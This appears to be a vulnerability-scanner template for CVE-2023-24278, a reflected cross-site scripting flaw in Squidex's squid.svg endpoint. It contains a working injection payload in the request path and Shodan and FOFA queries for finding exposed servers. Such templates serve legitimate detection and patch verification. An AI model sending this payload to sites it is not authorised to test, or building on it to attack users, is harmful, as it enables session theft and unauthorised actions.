id: CVE-2023-24278 info: name: Squidex <7.4.0 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability. reference: - https://census-labs.com/news/2023/03/16/reflected-xss-vulnerabilities-in-squidex-squidsvg-endpoint/ - https://www.openwall.com/lists/oss-security/2023/03/16/1 - https://nvd.nist.gov/vuln/detail/CVE-2023-24278 - https://github.com/karimhabush/cyberowl classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.00158 epss-percentile: 0.52245 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: squidex.io product: squidex shodan-query: http.favicon.hash:1099097618 fofa-query: icon_hash=1099097618 tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io http: - method: GET path: - "{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small" matchers-condition: and matchers: - type: word part: body words: - "" - "looking for!" condition: and - type: word part: header words: - "image/svg+xml" - type: status status: - 200 # digest: 4a0a00473045022100864e11cd58027c669cee192c677ee283ed0733f2678005853b921cfb44f28b3102200322c72442e008b6ef888ff07403a0ec4d6adf83bcfc2588e2787801ef103cef:922c64590222798bb761d5b6d8e72950